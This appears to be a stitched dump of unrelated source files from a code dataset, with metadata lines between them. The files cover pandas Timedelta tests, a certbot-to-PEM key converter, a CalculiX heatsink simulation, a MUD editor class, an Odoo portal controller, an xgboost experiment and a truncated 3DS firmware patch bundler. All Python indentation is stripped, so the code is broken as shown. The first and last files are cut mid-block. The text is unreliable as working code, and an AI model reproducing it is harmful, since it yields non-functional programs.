td64 = td.to_timedelta64()
assert td64 == np.timedelta64(td.value, 'ns')
assert td == td64
assert isinstance(td64, np.timedelta64)
# this is NOT equal and cannot be roundtriped (because of the nanos)
td = Timedelta('1 days, 10:11:12.012345678')
assert td != td.to_pytimedelta()
def test_freq_conversion(self):
# truediv
td = Timedelta('1 days 2 hours 3 ns')
result = td / np.timedelta64(1, 'D')
assert result == td.value / float(86400 * 1e9)
result = td / np.timedelta64(1, 's')
assert result == td.value / float(1e9)
result = td / np.timedelta64(1, 'ns')
assert result == td.value
# floordiv
td = Timedelta('1 days 2 hours 3 ns')
result = td // np.timedelta64(1, 'D')
assert result == 1
result = td // np.timedelta64(1, 's')
assert result == 93600
result = td // np.timedelta64(1, 'ns')
assert result == td.value
def test_fields(self):
def check(value):
# that we are int/long like
assert isinstance(value, (int, compat.long))
# compat to datetime.timedelta
rng = to_timedelta('1 days, 10:11:12')
assert rng.days == 1
assert rng.seconds == 10 * 3600 + 11 * 60 + 12
assert rng.microseconds == 0
assert rng.nanoseconds == 0
pytest.raises(AttributeError, lambda: rng.hours)
pytest.raises(AttributeError, lambda: rng.minutes)
pytest.raises(AttributeError, lambda: rng.milliseconds)
# GH 10050
check(rng.days)
check(rng.seconds)
check(rng.microseconds)
check(rng.nanoseconds)
td = Timedelta('-1 days, 10:11:12')
assert abs(td) == Timedelta('13:48:48')
assert str(td) == "-1 days +10:11:12"
assert -td == Timedelta('0 days 13:48:48')
assert -Timedelta('-1 days, 10:11:12').value == 49728000000000
assert Timedelta('-1 days, 10:11:12').value == -49728000000000
rng = to_timedelta('-1 days, 10:11:12.100123456')
assert rng.days == -1
assert rng.seconds == 10 * 3600 + 11 * 60 + 12
assert rng.microseconds == 100 * 1000 + 123
assert rng.nanoseconds == 456
pytest.raises(AttributeError, lambda: rng.hours)
pytest.raises(AttributeError, lambda: rng.minutes)
pytest.raises(AttributeError, lambda: rng.milliseconds)
# components
tup = pd.to_timedelta(-1, 'us').components
assert tup.days == -1
assert tup.hours == 23
assert tup.minutes == 59
assert tup.seconds == 59
assert tup.milliseconds == 999
assert tup.microseconds == 999
assert tup.nanoseconds == 0
# GH 10050
check(tup.days)
check(tup.hours)
check(tup.minutes)
check(tup.seconds)
check(tup.milliseconds)
check(tup.microseconds)
check(tup.nanoseconds)
tup = Timedelta('-1 days 1 us').components
assert tup.days == -2
assert tup.hours == 23
assert tup.minutes == 59
assert tup.seconds == 59
assert tup.milliseconds == 999
assert tup.microseconds == 999
assert tup.nanoseconds == 0
def test_nat_converters(self):
assert to_timedelta('nat', box=False).astype('int64') == iNaT
assert to_timedelta('nan', box=False).astype('int64') == iNaT
def testit(unit, transform):
# array
result = to_timedelta(np.arange(5), unit=unit)
expected = TimedeltaIndex([np.timedelta64(i, transform(unit))
for i in np.arange(5).tolist()])
tm.assert_index_equal(result, expected)
# scalar
result = to_timedelta(2, unit=unit)
expected = Timedelta(np.timedelta64(2, transform(unit)).astype(
'timedelta64[ns]'))
assert result == expected
# validate all units
# GH 6855
for unit in ['Y', 'M', 'W', 'D', 'y', 'w', 'd']:
testit(unit, lambda x: x.upper())
for unit in ['days', 'day', 'Day', 'Days']:
testit(unit, lambda x: 'D')
for unit in ['h', 'm', 's', 'ms', 'us', 'ns', 'H', 'S', 'MS', 'US',
'NS']:
testit(unit, lambda x: x.lower())
# offsets
# m
testit('T', lambda x: 'm')
# ms
testit('L', lambda x: 'ms')
def test_numeric_conversions(self):
assert ct(0) == np.timedelta64(0, 'ns')
assert ct(10) == np.timedelta64(10, 'ns')
assert ct(10, unit='ns') == np.timedelta64(10, 'ns').astype('m8[ns]')
assert ct(10, unit='us') == np.timedelta64(10, 'us').astype('m8[ns]')
assert ct(10, unit='ms') == np.timedelta64(10, 'ms').astype('m8[ns]')
assert ct(10, unit='s') == np.timedelta64(10, 's').astype('m8[ns]')
assert ct(10, unit='d') == np.timedelta64(10, 'D').astype('m8[ns]')
def test_timedelta_conversions(self):
assert (ct(timedelta(seconds=1)) ==
np.timedelta64(1, 's').astype('m8[ns]'))
assert (ct(timedelta(microseconds=1)) ==
np.timedelta64(1, 'us').astype('m8[ns]'))
assert (ct(timedelta(days=1)) ==
np.timedelta64(1, 'D').astype('m8[ns]'))
def test_round(self):
t1 = Timedelta('1 days 02:34:56.789123456')
t2 = Timedelta('-1 days 02:34:56.789123456')
for (freq, s1, s2) in [('N', t1, t2),
('U', Timedelta('1 days 02:34:56.789123000'),
Timedelta('-1 days 02:34:56.789123000')),
('L', Timedelta('1 days 02:34:56.789000000'),
Timedelta('-1 days 02:34:56.789000000')),
('S', Timedelta('1 days 02:34:57'),
Timedelta('-1 days 02:34:57')),
('2S', Timedelta('1 days 02:34:56'),
Timedelta('-1 days 02:34:56')),
('5S', Timedelta('1 days 02:34:55'),
Timedelta('-1 days 02:34:55')),
('T', Timedelta('1 days 02:35:00'),
Timedelta('-1 days 02:35:00')),
('12T', Timedelta('1 days 02:36:00'),
Timedelta('-1 days 02:36:00')),
('H', Timedelta('1 days 03:00:00'),
Timedelta('-1 days 03:00:00')),
('d', Timedelta('1 days'),
Timedelta('-1 days'))]:
r1 = t1.round(freq)
assert r1 == s1
r2 = t2.round(freq)
assert r2 == s2
# invalid
for freq in ['Y', 'M', 'foobar']:
pytest.raises(ValueError, lambda: t1.round(freq))
t1 = timedelta_range('1 days', periods=3, freq='1 min 2 s 3 us')
t2 = -1 * t1
t1a = timedelta_range('1 days', periods=3, freq='1 min 2 s')
t1c = pd.TimedeltaIndex([1, 1, 1], unit='D')
# note that negative times round DOWN! so don't give whole numbers
for (freq, s1, s2) in [('N', t1, t2),
('U', t1, t2),
('L', t1a,
TimedeltaIndex(['-1 days +00:00:00',
'-2 days +23:58:58',
'-2 days +23:57:56'],
dtype='timedelta64[ns]',
freq=None)
),
('S', t1a,
TimedeltaIndex(['-1 days +00:00:00',
'-2 days +23:58:58',
'-2 days +23:57:56'],
dtype='timedelta64[ns]',
freq=None)
),
('12T', t1c,
TimedeltaIndex(['-1 days',
'-1 days',
'-1 days'],
dtype='timedelta64[ns]',
freq=None)
),
('H', t1c,
TimedeltaIndex(['-1 days',
'-1 days',
'-1 days'],
dtype='timedelta64[ns]',
freq=None)
),
('d', t1c,
pd.TimedeltaIndex([-1, -1, -1], unit='D')
)]:
r1 = t1.round(freq)
tm.assert_index_equal(r1, s1)
r2 = t2.round(freq)
tm.assert_index_equal(r2, s2)
# invalid
for freq in ['Y', 'M', 'foobar']:
pytest.raises(ValueError, lambda: t1.round(freq))
def test_contains(self):
# Checking for any NaT-like objects
# GH 13603
td = to_timedelta(range(5), unit='d') + pd.offsets.Hour(1)
for v in [pd.NaT, None, float('nan'), np.nan]:
assert not (v in td)
td = to_timedelta([pd.NaT])
for v in [pd.NaT, None, float('nan'), np.nan]:
assert (v in td)
def test_identity(self):
td = Timedelta(10, unit='d')
assert isinstance(td, Timedelta)
assert isinstance(td, timedelta)
def test_short_format_converters(self):
def conv(v):
return v.astype('m8[ns]')
assert ct('10') == np.timedelta64(10, 'ns')
assert ct('10ns') == np.timedelta64(10, 'ns')
assert ct('100') == np.timedelta64(100, 'ns')
assert ct('100ns') == np.timedelta64(100, 'ns')
assert ct('1000') == np.timedelta64(1000, 'ns')
assert ct('1000ns') == np.timedelta64(1000, 'ns')
assert ct('1000NS') == np.timedelta64(1000, 'ns')
assert ct('10us') == np.timedelta64(10000, 'ns')
assert ct('100us') == np.timedelta64(100000, 'ns')
assert ct('1000us') == np.timedelta64(1000000, 'ns')
assert ct('1000Us') == np.timedelta64(1000000, 'ns')
assert ct('1000uS') == np.timedelta64(1000000, 'ns')
assert ct('1ms') == np.timedelta64(1000000, 'ns')
assert ct('10ms') == np.timedelta64(10000000, 'ns')
assert ct('100ms') == np.timedelta64(100000000, 'ns')
assert ct('1000ms') == np.timedelta64(1000000000, 'ns')
assert ct('-1s') == -np.timedelta64(1000000000, 'ns')
assert ct('1s') == np.timedelta64(1000000000, 'ns')
assert ct('10s') == np.timedelta64(10000000000, 'ns')
assert ct('100s') == np.timedelta64(100000000000, 'ns')
assert ct('1000s') == np.timedelta64(1000000000000, 'ns')
assert ct('1d') == conv(np.timedelta64(1, 'D'))
assert ct('-1d') == -conv(np.timedelta64(1, 'D'))
assert ct('1D') == conv(np.timedelta64(1, 'D'))
assert ct('10D') == conv(np.timedelta64(10, 'D'))
assert ct('100D') == conv(np.timedelta64(100, 'D'))
assert ct('1000D') == conv(np.timedelta64(1000, 'D'))
assert ct('10000D') == conv(np.timedelta64(10000, 'D'))
# space
assert ct(' 10000D ') == conv(np.timedelta64(10000, 'D'))
assert ct(' - 10000D ') == -conv(np.timedelta64(10000, 'D'))
# invalid
pytest.raises(ValueError, ct, '1foo')
pytest.raises(ValueError, ct, 'foo')
def test_full_format_converters(self):
def conv(v):
return v.astype('m8[ns]')
d1 = np.timedelta64(1, 'D')
assert ct('1days') == conv(d1)
assert ct('1days,') == conv(d1)
assert ct('- 1days,') == -conv(d1)
assert ct('00:00:01') == conv(np.timedelta64(1, 's'))
assert ct('06:00:01') == conv(np.timedelta64(6 * 3600 + 1, 's'))
assert ct('06:00:01.0') == conv(np.timedelta64(6 * 3600 + 1, 's'))
assert ct('06:00:01.01') == conv(np.timedelta64(
1000 * (6 * 3600 + 1) + 10, 'ms'))
assert (ct('- 1days, 00:00:01') ==
conv(-d1 + np.timedelta64(1, 's')))
assert (ct('1days, 06:00:01') ==
conv(d1 + np.timedelta64(6 * 3600 + 1, 's')))
assert (ct('1days, 06:00:01.01') ==
conv(d1 + np.timedelta64(1000 * (6 * 3600 + 1) + 10, 'ms')))
# invalid
pytest.raises(ValueError, ct, '- 1days, 00')
def test_overflow(self):
# GH 9442
s = Series(pd.date_range('20130101', periods=100000, freq='H'))
s[0] += pd.Timedelta('1s 1ms')
# mean
result = (s - s.min()).mean()
expected = pd.Timedelta((pd.DatetimeIndex((s - s.min())).asi8 / len(s)
).sum())
# the computation is converted to float so
# might be some loss of precision
assert np.allclose(result.value / 1000, expected.value / 1000)
# sum
pytest.raises(ValueError, lambda: (s - s.min()).sum())
s1 = s[0:10000]
pytest.raises(ValueError, lambda: (s1 - s1.min()).sum())
s2 = s[0:1000]
result = (s2 - s2.min()).sum()
def test_pickle(self):
v = Timedelta('1 days 10:11:12.0123456')
v_p = tm.round_trip_pickle(v)
assert v == v_p
def test_timedelta_hash_equality(self):
# GH 11129
v = Timedelta(1, 'D')
td = timedelta(days=1)
assert hash(v) == hash(td)
d = {td: 2}
assert d[v] == 2
tds = timedelta_range('1 second', periods=20)
assert all(hash(td) == hash(td.to_pytimedelta()) for td in tds)
# python timedeltas drop ns resolution
ns_td = Timedelta(1, 'ns')
assert hash(ns_td) != hash(ns_td.to_pytimedelta())
def test_implementation_limits(self):
min_td = Timedelta(Timedelta.min)
max_td = Timedelta(Timedelta.max)
# GH 12727
# timedelta limits correspond to int64 boundaries
assert min_td.value == np.iinfo(np.int64).min + 1
assert max_td.value == np.iinfo(np.int64).max
# Beyond lower limit, a NAT before the Overflow
assert (min_td - Timedelta(1, 'ns')) is NaT
with pytest.raises(OverflowError):
min_td - Timedelta(2, 'ns')
with pytest.raises(OverflowError):
max_td + Timedelta(1, 'ns')
# Same tests using the internal nanosecond values
td = Timedelta(min_td.value - 1, 'ns')
assert td is NaT
with pytest.raises(OverflowError):
Timedelta(min_td.value - 2, 'ns')
with pytest.raises(OverflowError):
Timedelta(max_td.value + 1, 'ns')
def test_timedelta_arithmetic(self):
data = pd.Series(['nat', '32 days'], dtype='timedelta64[ns]')
deltas = [timedelta(days=1), Timedelta(1, unit='D')]
for delta in deltas:
result_method = data.add(delta)
result_operator = data + delta
expected = pd.Series(['nat', '33 days'], dtype='timedelta64[ns]')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
result_method = data.sub(delta)
result_operator = data - delta
expected = pd.Series(['nat', '31 days'], dtype='timedelta64[ns]')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
# GH 9396
result_method = data.div(delta)
result_operator = data / delta
expected = pd.Series([np.nan, 32.], dtype='float64')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
def test_apply_to_timedelta(self):
timedelta_NaT = pd.to_timedelta('NaT')
list_of_valid_strings = ['00:00:01', '00:00:02']
a = pd.to_timedelta(list_of_valid_strings)
b = Series(list_of_valid_strings).apply(pd.to_timedelta)
# Can't compare until apply on a Series gives the correct dtype
# assert_series_equal(a, b)
list_of_strings = ['00:00:01', np.nan, pd.NaT, timedelta_NaT]
# TODO: unused?
a = pd.to_timedelta(list_of_strings) # noqa
b = Series(list_of_strings).apply(pd.to_timedelta) # noqa
# Can't compare until apply on a Series gives the correct dtype
# assert_series_equal(a, b)
def test_components(self):
rng = timedelta_range('1 days, 10:11:12', periods=2, freq='s')
rng.components
# with nat
s = Series(rng)
s[1] = np.nan
result = s.dt.components
assert not result.iloc[0].isna().all()
assert result.iloc[1].isna().all()
def test_isoformat(self):
td = Timedelta(days=6, minutes=50, seconds=3,
milliseconds=10, microseconds=10, nanoseconds=12)
expected = 'P6DT0H50M3.010010012S'
result = td.isoformat()
assert result == expected
td = Timedelta(days=4, hours=12, minutes=30, seconds=5)
result = td.isoformat()
expected = 'P4DT12H30M5S'
assert result == expected
td = Timedelta(nanoseconds=123)
result = td.isoformat()
expected = 'P0DT0H0M0.000000123S'
assert result == expected
# trim nano
td = Timedelta(microseconds=10)
result = td.isoformat()
expected = 'P0DT0H0M0.00001S'
assert result == expected
# trim micro
td = Timedelta(milliseconds=1)
result = td.isoformat()
expected = 'P0DT0H0M0.001S'
assert result == expected
# don't strip every 0
result = Timedelta(minutes=1).isoformat()
expected = 'P0DT0H1M0S'
assert result == expected
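# Editorial note (added): this module is meant to be collected by pytest, e.g.
# pytest pandas/tests/scalar/test_timedelta.py -k "round" -v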
| bsd-3-clause | 3,114,407,795,892,254,000 | 37.608187 | 79 | 0.526022 | false |
szepeviktor/debian-server-tools | security/jwk_convert.py | 1 | 1364 | #!/usr/bin/python
"""Convert certbot private_key.json to manuale's account.json
Source: https://gist.github.com/JonLundy/f25c99ee0770e19dc595
./jwk_convert.py private_key.json > private-key.asn1
openssl asn1parse -genconf private-key.asn1 -noout -out private-key.der
openssl rsa -inform DER -in private-key.der -outform PEM -out private-key.key
echo -n '{"key": "' > account.json
paste -s -d '|' private-key.key | sed -e 's/|/\\n/g' | tr -d '\n' >> account.json
echo '", "uri": "https://acme-v01.api.letsencrypt.org/acme/reg/9999999"}' >> account.json # From regr.json
"""
import sys
import json
import base64
import binascii
with open(sys.argv[1]) as fp:
PKEY = json.load(fp)
def enc(data):
missing_padding = -len(data) % 4 # 0 when length is already a multiple of 4
if missing_padding:
data += b'=' * missing_padding
return '0x'+binascii.hexlify(base64.b64decode(data, b'-_')).upper()
for k, v in PKEY.items():
if k == 'kty':
continue
PKEY[k] = enc(v.encode())
print "asn1=SEQUENCE:private_key\n[private_key]\nversion=INTEGER:0"
print "n=INTEGER:{}".format(PKEY[u'n'])
print "e=INTEGER:{}".format(PKEY[u'e'])
print "d=INTEGER:{}".format(PKEY[u'd'])
print "p=INTEGER:{}".format(PKEY[u'p'])
print "q=INTEGER:{}".format(PKEY[u'q'])
print "dp=INTEGER:{}".format(PKEY[u'dp'])
print "dq=INTEGER:{}".format(PKEY[u'dq'])
print "qi=INTEGER:{}".format(PKEY[u'qi'])
| mit | -5,849,783,586,539,344,000 | 32.268293 | 106 | 0.66349 | false |
zagl/ccx-user | tutorials/auto/geom.py | 1 | 3805 | #!/usr/bin/env python3
import pycgx
import re
import fileinput
import subprocess
def heatSinkTemp(length, width, height, n_fins, fin_width,
base_width, conductivity, ta, emissivity, flux):
    fin_spacing = (width - fin_width) / (n_fins - 1) - fin_width
flux_density = flux / (length*width)
c = pycgx.Cgx()
heatsink = c.makeHeatsink(
[0., 0., 0.],
[length, width, height],
n_fins, fin_width, base_width,
[4,2,2],
'heatsink'
)
top = c.makeSet("ht")
top.add(heatsink.maxX)
bottom = c.makeSet("hb")
bottom.add(heatsink.minX)
channel = c.makeSet("hc")
channel.add(heatsink.inside)
walls = c.makeSet("hw")
walls.add(heatsink.minZ)
walls.add(heatsink.maxZ)
walls.add(heatsink.minY)
walls.add(heatsink.maxY)
rad = c.makeSet('rad')
rad.add(heatsink.inside)
rad.add(heatsink.minX)
rad.add(heatsink.maxX)
rad.add(heatsink.minY)
rad.add(heatsink.maxY)
rad.add(heatsink.maxZ)
flux = c.makeSet("flux")
flux.add(heatsink.minZ)
c.meshLinear()
c.sendMesh()
top.sendFilm()
bottom.sendFilm()
channel.sendFilm()
walls.sendFilm()
rad.sendRadiate()
flux.sendFlux()
c.write('send.fbd')
out = subprocess.getoutput('cgx -bg send.fbd')
l_hor = fin_width*height/(2*(fin_width+height))
with fileinput.FileInput('ht.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUT {0:d}; {1:0.3e}'\
.format(int(ta), l_hor), line), end='')
with fileinput.FileInput('hb.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUB {0:d}; {1:0.3e}'\
.format(int(ta), l_hor), line), end='')
with fileinput.FileInput('hw.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUW {0:d}; {1:0.3e}'\
.format(int(ta), length), line), end='')
with fileinput.FileInput('hc.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUC {0:d}; {1:3d}; {2:d}'\
.format(int(ta), int(length*1000), int(fin_spacing*1e6)),
line, ), end='')
with fileinput.FileInput('rad.rad', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(R[0-9])', r'\1CR', line), end='')
case_deck = '''\
*INCLUDE, INPUT=all.msh
*MATERIAL, Name=Aluminium
*CONDUCTIVITY
%f,0.
*SOLID SECTION, Elset=Eall, Material=Aluminium
*PHYSICAL CONSTANTS,ABSOLUTE ZERO=-273.15,STEFAN BOLTZMANN=5.669E-8
*INITIAL CONDITIONS,TYPE=TEMPERATURE
Nall, %f
*AMPLITUDE, NAME=Aflux
0., %f
*AMPLITUDE, NAME=AinfTemp
0., %f
*AMPLITUDE, NAME=ARad
0., %f
*STEP
*HEAT TRANSFER,STEADY STATE
*DFLUX, AMPLITUDE=Aflux
*INCLUDE, INPUT=flux.dfl
*FILM
*INCLUDE, INPUT=hb.flm
*INCLUDE, INPUT=ht.flm
*INCLUDE, INPUT=hw.flm
*INCLUDE, INPUT=hc.flm
*RADIATE, AMPLITUDE=AinfTemp, RADIATION AMPLITUDE=ARad
*INCLUDE, INPUT=rad.rad
*EL FILE
HFL
*NODE FILE
NT,RFL
*END STEP''' % (conductivity, ta, flux_density, ta, emissivity)
with open('case.inp', 'w') as fobj:
fobj.write(case_deck)
out = subprocess.getoutput('../../application/ccx case')
eval_fbd = '''\
read case.frd
ds 1 e 1'''
with open('eval.fbd', 'w') as fobj:
fobj.write(eval_fbd)
out = subprocess.getoutput('cgx -bg eval.fbd | grep max')
return float(out[5:17])
#for n in range(2,20):
if True:
n = 9
t = heatSinkTemp(
length = 0.113,
width = 0.075,
height = 0.026,
n_fins = 9,
fin_width = 2.2e-3,
base_width = 11e-3,
conductivity = 120.,
ta = 20.,
emissivity = 0.1,
flux = 14.,
)
print(n, t)
| gpl-2.0 | 7,893,655,362,739,145,000 | 23.548387 | 73 | 0.583443 | false |
stormi/tsunami | src/primaires/pnj/editeurs/pedit/supprimer.py | 1 | 2851 | # -*-coding:Utf-8 -*
# Copyright (c) 2013 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le contexte éditeur Supprimer"""
from primaires.interpreteur.editeur.supprimer import Supprimer
class NSupprimer(Supprimer):
"""Classe définissant le contexte éditeur 'supprimer'.
Ce contexte permet spécifiquement de supprimer un prototype de PNJ.
"""
def interpreter(self, msg):
"""Interprétation du contexte"""
msg = msg.lower()
prototype = self.objet
if msg == "oui":
objet = type(self).importeur
for nom in self.action.split("."):
objet = getattr(objet, nom)
nb_objets = len(prototype.pnj)
if nb_objets > 0:
s = nb_objets > 1 and "s" or ""
nt = nb_objets > 1 and "nt" or ""
self.pere << "|err|{} PNJ{s} existe{nt} modelé{s} sur ce " \
"prototype. Opération annulée.|ff|".format(nb_objets,
s=s, nt=nt)
self.migrer_contexte(self.opts.rci_ctx_prec)
else:
objet(self.objet.cle)
self.fermer()
self.pere << self.confirme
elif msg == "non":
self.migrer_contexte(self.opts.rci_ctx_prec)
else:
self.pere << "|err|Choix invalide.|ff|"
| bsd-3-clause | 1,578,359,433,482,653,200 | 41.432836 | 79 | 0.669012 | false |
tvtsoft/odoo8 | addons/website_portal/controllers/main.py | 1 | 5029 | # -*- coding: utf-8 -*-
import datetime
from openerp import http
from openerp.http import request
from openerp import tools
from openerp.tools.translate import _
class website_account(http.Controller):
@http.route(['/my', '/my/home'], type='http', auth="public", website=True)
def account(self):
partner = request.env.user.partner_id
values = {
'date': datetime.date.today().strftime('%Y-%m-%d')
}
res_sale_order = request.env['sale.order']
res_invoices = request.env['account.invoice']
quotations = res_sale_order.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['sent', 'cancel'])
])
orders = res_sale_order.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['progress', 'manual', 'shipping_except', 'invoice_except', 'done'])
])
invoices = res_invoices.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['open', 'paid', 'cancelled'])
])
values.update({
'quotations': quotations,
'orders': orders,
'invoices': invoices
})
# get customer sales rep
if partner.user_id:
sales_rep = partner.user_id
else:
sales_rep = False
values.update({
'sales_rep': sales_rep,
'company': request.website.company_id,
'user': request.env.user
})
return request.website.render("website_portal.account", values)
@http.route(['/my/orders/<int:order>'], type='http', auth="user", website=True)
def orders_followup(self, order=None):
partner = request.env['res.users'].browse(request.uid).partner_id
domain = [
('partner_id.id', '=', partner.id),
('state', 'not in', ['draft', 'cancel']),
('id', '=', order)
]
order = request.env['sale.order'].search(domain)
invoiced_lines = request.env['account.invoice.line'].search([('invoice_id', 'in', order.invoice_ids.ids)])
order_invoice_lines = {il.product_id.id: il.invoice_id for il in invoiced_lines}
return request.website.render("website_portal.orders_followup", {
'order': order.sudo(),
'order_invoice_lines': order_invoice_lines,
})
@http.route(['/my/account'], type='http', auth='user', website=True)
def details(self, redirect=None, **post):
partner = request.env['res.users'].browse(request.uid).partner_id
values = {
'error': {},
'error_message': []
}
if post:
error, error_message = self.details_form_validate(post)
values.update({'error': error, 'error_message': error_message})
values.update(post)
if not error:
post.update({'zip': post.pop('zipcode', '')})
partner.sudo().write(post)
if redirect:
return request.redirect(redirect)
return request.redirect('/my/home')
countries = request.env['res.country'].sudo().search([])
states = request.env['res.country.state'].sudo().search([])
values.update({
'partner': partner,
'countries': countries,
'states': states,
'has_check_vat': hasattr(request.env['res.partner'], 'check_vat'),
'redirect': redirect,
})
return request.website.render("website_portal.details", values)
def details_form_validate(self, data):
error = dict()
error_message = []
mandatory_billing_fields = ["name", "phone", "email", "street2", "city", "country_id"]
# Validation
for field_name in mandatory_billing_fields:
if not data.get(field_name):
error[field_name] = 'missing'
# email validation
if data.get('email') and not tools.single_email_re.match(data.get('email')):
error["email"] = 'error'
error_message.append(_('Invalid Email! Please enter a valid email address.'))
# vat validation
if data.get("vat") and hasattr(request.env["res.partner"], "check_vat"):
if request.website.company_id.vat_check_vies:
# force full VIES online check
check_func = request.env["res.partner"].vies_vat_check
else:
# quick and partial off-line checksum validation
check_func = request.env["res.partner"].simple_vat_check
vat_country, vat_number = request.env["res.partner"]._split_vat(data.get("vat"))
if not check_func(vat_country, vat_number): # simple_vat_check
error["vat"] = 'error'
# error message for empty required fields
if [err for err in error.values() if err == 'missing']:
error_message.append(_('Some required fields are empty.'))
return error, error_message
| agpl-3.0 | -6,674,752,753,006,959,000 | 37.098485 | 114 | 0.552993 | false |
tks0123456789/XGB_experiments | test_colsample_bylevel.py | 1 | 2864 | import xgboost as xgb
from sklearn.datasets import make_classification
n = 2 ** 15
X, y = make_classification(n_samples=n+1, n_features=10, n_informative=5, n_redundant=5,
shuffle=True, random_state=123)
param = {'objective':'binary:logistic','tree_method':'approx',
'eval_metric':'logloss','seed':123}
print('num_row:%d tree_method:%s' % (n+1, 'approx'))
dtrain = xgb.DMatrix(X, y)
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
print('num_row:%d tree_method:%s' % (n, 'approx'))
dtrain = xgb.DMatrix(X[:n], y[:n])
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
print('num_row:%d tree_method:%s' % (n+1, 'exact'))
param['tree_method'] = 'exact'
dtrain = xgb.DMatrix(X, y)
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
"""
num_row:32769 tree_method:approx
colsample_bylevel:1.00
[02:55:11] Tree method is selected to be 'approx'
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
colsample_bylevel:0.10
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
colsample_bylevel:0.01
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
num_row:32768 tree_method:approx
colsample_bylevel:1.00
[02:55:44] Tree method is selected to be 'approx'
[02:55:44] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 118 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.504609
colsample_bylevel:0.10
[02:55:44] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 114 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.546038
colsample_bylevel:0.01
[02:55:44] dmlc-core/include/dmlc/logging.h:235: [02:55:44] src/tree/updater_colmaker.cc:637: Check failed: (n) > (0) colsample_bylevel is too small that no feature can be included
num_row:32769 tree_method:exact
colsample_bylevel:1.00
[03:04:47] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 118 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.504607
colsample_bylevel:0.10
[03:04:47] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 114 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.546035
colsample_bylevel:0.01
[03:04:47] dmlc-core/include/dmlc/logging.h:235: [03:04:47] src/tree/updater_colmaker.cc:637: Check failed: (n) > (0) colsample_bylevel is too small that no feature can be included
"""
| mit | 2,984,193,907,683,911,700 | 42.393939 | 180 | 0.693785 | false |
Shadowtrance/CakesForeveryWan | patches/bundle.py | 1 | 3840 | from __future__ import print_function
from sys import argv, exit, stderr
from os import mkdir, makedirs, chdir, system, getcwd
from os.path import getsize
from re import search
from json import loads
from struct import pack
from errno import EEXIST
if len(argv) < 5:
print("Usage: bundle.py <info json> <assembly for patches> <build dir> <out dir>", file=stderr)
exit(1)
info = loads(open(argv[1]).read())
patches_file = open(argv[2]).read()
dir_build = argv[3]
dir_out = argv[4]
dir_top = getcwd()
console_dict = {
"o3ds": 0,
"n3ds": 1
}
type_dict = {
"NATIVE_FIRM": 0,
"TWL_FIRM": 1,
"AGB_FIRM": 2
}
options_dict = {
"keyx": 0b00000001,
"emunand": 0b00000010,
"save": 0b00000100
}
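# Each patch's options list is folded into a single bitmask byte further down;
# for example a patch declaring ["keyx", "emunand"] ends up with options = 0b00000011.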
for version in info["version_specific"]:
patches = []
patch_count = len(info["patches"])
verdir_build = dir_build + "/" + version["console"] + "-" + version["version"]
verdir_out = dir_out + "/" + version["console"] + "-" + version["version"]
verfile = patches_file
# Create the patches array based on the global and the version-specific array.
for index in range(patch_count):
patch = {}
for array in [info["patches"][index], version["patches"][index]]:
for patch_info in array:
